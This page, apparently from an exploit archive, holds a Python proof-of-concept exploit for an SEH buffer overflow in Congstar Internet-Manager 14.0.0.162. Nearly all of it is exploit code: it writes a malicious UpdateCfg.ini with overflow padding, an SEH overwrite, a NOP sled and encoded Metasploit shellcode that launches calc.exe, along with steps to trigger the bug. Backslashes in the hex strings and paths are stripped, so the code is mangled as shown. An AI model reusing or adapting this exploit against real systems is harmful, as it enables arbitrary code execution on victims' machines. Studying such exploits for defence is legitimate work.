Home / exploits Congstar Internet-Manager SEH Buffer Overflow
Posted on 14 January 2015
#!/usr/bin/python #Exploit Title:Congstar Internet-Manager SEH Buffer Overflow #Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100) #Homepage:www.congstar.de/downloads/prepaid-internet-stick/ #Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip #Version:14.0.0.162 #Found:8.01.2015 #Exploit Author: metacom - twitter.com/m3tac0m #Tested on: Windows 7 En print "[*]Copy UpdateCfg.ini to C:Program FilescongstarInternetmanagerBin " print "[*]Open Program and go to Menu-Options " print "[*]Click Update and press Now look for Update " print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen " from struct import pack buffer1 = "x5bx55x50x44x41x54x45x5dx0ax0ax45x4ex41x42x4cx45x5fx55x50x44x41x54x45x3dx31x0ax0ax55x50x44" buffer1 += "x41x54x45x5fx46x52x45x51x55x45x4ex43x45x3dx31x34x0ax0ax5bx53x65x72x76x69x63x65x5dx0ax0ax53" buffer1 += "x65x72x76x69x63x65x55x52x4cx3dx68x74x74x70x73x3ax2fx2fx74x6dx6fx62x69x6cx65x2ex7ax74x65x2e" buffer1 += "x63x6fx6dx2ex63x6ex2fx55x70x64x61x74x65x45x6ex74x72x79x2ex61x73x70x78x0a" junk="x41" * 18164 nseh="xebx06x90x90" seh=pack('<I',0x7C3A1868)#7C3A1868 nops="x90" * 100 #msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | #msfencode -e x86/alpha_upper -b "x00x0ax0dx1axff" -t c shellcode=("x89xe2xddxc1xd9x72xf4x5ex56x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx5ax48x4dx59x55x50" "x35x50x35x50x53x50x4dx59x4bx55x46x51x59x42x33" "x54x4cx4bx56x32x30x30x4cx4bx31x42x44x4cx4cx4b" "x30x52x45x44x4cx4bx44x32x57x58x34x4fx38x37x50" "x4ax51x36x46x51x4bx4fx30x31x49x50x4ex4cx47x4c" "x33x51x43x4cx34x42x36x4cx31x30x49x51x48x4fx54" "x4dx45x51x59x57x4dx32x4cx30x56x32x46x37x4cx4b" "x31x42x44x50x4cx4bx31x52x57x4cx43x31x48x50x4c" "x4bx51x50x53x48x4bx35x49x50x34x34x51x5ax53x31" "x4ex30x36x30x4cx4bx50x48x52x38x4cx4bx36x38x47" "x50x45x51x58x53x4bx53x57x4cx37x39x4cx4bx36x54" "x4cx4bx33x31x39x46x30x31x4bx4fx56x51x49x50x4e" "x4cx4fx31x58x4fx44x4dx55x51x49x57x37x48x4dx30" "x52x55x4bx44x43x33x43x4dx4ax58x37x4bx33x4dx57" "x54x33x45x4bx52x30x58x4cx4bx36x38x57x54x33x31" "x58x53x55x36x4cx4bx54x4cx30x4bx4cx4bx56x38x45" "x4cx35x51x58x53x4cx4bx55x54x4cx4bx33x31x38x50" "x4bx39x57x34x31x34x46x44x51x4bx31x4bx53x51x30" "x59x50x5ax46x31x4bx4fx4dx30x51x48x31x4fx30x5a" "x4cx4bx34x52x5ax4bx4cx46x31x4dx33x5ax43x31x4c" "x4dx4cx45x38x39x55x50x45x50x43x30x50x50x53x58" "x56x51x4cx4bx32x4fx4cx47x4bx4fx38x55x4fx4bx4b" "x4ex44x4ex30x32x4ax4ax32x48x39x36x4cx55x4fx4d" "x4dx4dx4bx4fx4ex35x47x4cx33x36x43x4cx35x5ax4d" "x50x4bx4bx4bx50x54x35x33x35x4fx4bx47x37x52x33" "x54x32x32x4fx42x4ax43x30x46x33x4bx4fx49x45x52" "x43x53x51x42x4cx53x53x46x4ex43x55x43x48x35x35" "x43x30x41x41") poc=" " + "UpdateReport" + "=" + junk + nseh + seh + nops + shellcode +" " buffer2 = "x53x65x72x76x69x63x65x50x6fx72x74x3dx34x34x33x0ax0ax55x50x44x41x54x45x5fx50x41x54x48x3dx2e" buffer2 += "x2fx64x6fx77x6ex6cx6fx61x64x0ax0ax52x45x54x52x59x5fx43x4fx4ex4ex45x43x54x3dx33x30x30x0ax0a" buffer2 += "x52x45x54x52x59x5fx53x4cx45x45x50x3dx31x0ax0ax43x4fx4ex4ex45x43x54x5fx54x49x4dx45x4fx55x54" buffer2 += "x3dx32x30x0ax0ax5bx55x70x64x61x74x65x4dx6fx64x65x5dx0ax0ax4dx6fx64x65x53x65x6cx65x63x74x53" buffer2 += "x79x73x3dx31x0a" exploit = buffer1 + poc + buffer2 try: out_file = open("UpdateCfg.ini",'w') out_file.write(exploit) out_file.close() except: print "Error"
